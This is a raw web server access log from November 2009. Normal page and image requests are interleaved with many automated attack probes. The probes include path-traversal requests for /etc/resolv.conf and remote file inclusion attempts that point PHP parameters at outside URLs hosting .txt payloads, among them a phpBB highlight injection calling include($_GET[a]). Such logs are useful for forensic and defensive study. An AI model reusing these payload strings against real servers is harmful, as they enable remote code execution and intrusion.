85.13.138.104 - - [13/Nov/2009:02:36:05 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 200 409 "-" "-"
85.13.138.104 - - [13/Nov/2009:02:36:06 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 200 409 "-" "-"
119.122.75.54 - - [13/Nov/2009:02:36:12 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76798 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:14 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "TencentTraveler 4.0"
119.122.75.54 - - [13/Nov/2009:02:36:14 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:14 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:14 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:15 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:15 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:15 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:16 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:16 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:16 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:16 -0500] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:17 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:17 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:17 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:18 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:18 -0500] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:18 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:19 -0500] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:19 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:19 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:20 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:20 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:21 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:21 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:21 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:21 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:22 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:36:22 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
74.50.85.15 - - [13/Nov/2009:02:36:36 -0500] "GET /logs//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:02:36:36 -0500] "GET //ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:02:36:36 -0500] "GET /logs/access_log.Q109092500//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
174.143.126.121 - - [13/Nov/2009:02:36:48 -0500] "GET /logs/access_log.Q109050900//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 239 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.143.126.121 - - [13/Nov/2009:02:36:48 -0500] "GET //shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
72.55.179.121 - - [13/Nov/2009:02:36:51 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
72.55.179.121 - - [13/Nov/2009:02:36:51 -0500] "GET /logs/access_log.Q109071100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
72.55.179.121 - - [13/Nov/2009:02:36:51 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 200 25806 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
72.55.179.121 - - [13/Nov/2009:02:37:01 -0500] "GET /logs/access_log.Q109071100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
72.55.179.121 - - [13/Nov/2009:02:37:01 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
72.55.179.121 - - [13/Nov/2009:02:37:01 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 200 25806 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
174.143.126.121 - - [13/Nov/2009:02:37:27 -0500] "GET /logs/access_log.Q109050900//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
174.143.126.121 - - [13/Nov/2009:02:37:27 -0500] "GET //shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
174.143.126.121 - - [13/Nov/2009:02:37:27 -0500] "GET /logs//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
119.122.75.54 - - [13/Nov/2009:02:37:27 -0500] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
174.143.126.121 - - [13/Nov/2009:02:37:31 -0500] "GET /logs/error_log.Q109050900//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 238 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
119.122.75.54 - - [13/Nov/2009:02:37:37 -0500] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:37:37 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "TencentTraveler 4.0"
217.29.159.130 - - [13/Nov/2009:02:37:50 -0500] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://mickeysmoments.com/wp-content/uploads/tes.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
217.29.159.130 - - [13/Nov/2009:02:37:51 -0500] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://mickeysmoments.com/wp-content/uploads/tes.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
119.122.75.54 - - [13/Nov/2009:02:38:01 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:38:01 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
174.143.126.121 - - [13/Nov/2009:02:38:18 -0500] "GET //shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
70.38.112.174 - - [13/Nov/2009:02:38:18 -0500] "GET /logs/access_log.Q109101000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:02:38:18 -0500] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
174.143.126.121 - - [13/Nov/2009:02:38:22 -0500] "GET /logs/error_log.Q109050900//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
119.122.75.54 - - [13/Nov/2009:02:38:22 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.122.75.54 - - [13/Nov/2009:02:38:22 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; TencentTraveler 4.0; .NET CLR 2.0.50727)"
119.69.199.43 - - [13/Nov/2009:02:38:44 -0500] "GET /logs/access_log.Q109071100%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Nov/2009:02:39:27 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
119.69.199.43 - - [13/Nov/2009:02:39:28 -0500] "GET /logs/access_log.Q109071100%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:39:45 -0500] "GET /logs/access_log.Q109101000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:39:45 -0500] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.29.90.110 - - [13/Nov/2009:02:41:32 -0500] "GET /logs/access_log.Q109071100%20%20/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:42:20 -0500] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:02:42:20 -0500] "GET /logs/access_log.Q109101000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:02:42:35 -0500] "GET /logs/access_log.Q109071100%20%20/playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:02:42:35 -0500] "GET /playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:02:42:36 -0500] "GET /playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:02:42:37 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:02:42:37 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:02:42:37 -0500] "GET /logs/error_log.Q109091400/playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:02:42:42 -0500] "GET /logs/access_log.Q109071100/playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:02:42:44 -0500] "GET /logs/error_log.Q109091400%20%20/playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:02:43:41 -0500] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:02:43:41 -0500] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:02:43:41 -0500] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:02:43:41 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.109.248.165 - - [13/Nov/2009:02:43:50 -0500] "GET /admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
208.109.248.165 - - [13/Nov/2009:02:43:50 -0500] "GET /logs/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 218 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
208.109.248.165 - - [13/Nov/2009:02:43:50 -0500] "GET /logs/access_log.Q109071100/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
200.29.90.110 - - [13/Nov/2009:02:44:00 -0500] "GET /logs/access_log.Q109071100%20%20/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
80.74.145.119 - - [13/Nov/2009:02:44:50 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
80.74.145.119 - - [13/Nov/2009:02:44:50 -0500] "GET /logs/access_log.Q109071100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
80.74.145.119 - - [13/Nov/2009:02:44:51 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
80.74.145.119 - - [13/Nov/2009:02:45:00 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
80.74.145.119 - - [13/Nov/2009:02:45:00 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
80.74.145.119 - - [13/Nov/2009:02:45:01 -0500] "GET /logs/access_log.Q109071100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:02:45:01 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:02:45:01 -0500] "GET /playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:02:45:01 -0500] "GET /logs/access_log.Q109071100/playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:02:45:02 -0500] "GET /logs/error_log.Q109091400/playing.php/common/db.php?commonpath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:02:45:17 -0500] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:02:45:17 -0500] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:02:45:17 -0500] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:02:45:17 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:02:45:23 -0500] "GET /logs/error_log.Q109052900//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:02:45:23 -0500] "GET //////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:02:45:23 -0500] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 25815 "-" "Mozilla/5.0"
72.55.179.121 - - [13/Nov/2009:02:45:36 -0500] "GET /logs/access_log.Q109053100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
72.55.179.121 - - [13/Nov/2009:02:45:43 -0500] "GET /logs/access_log.Q109053100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
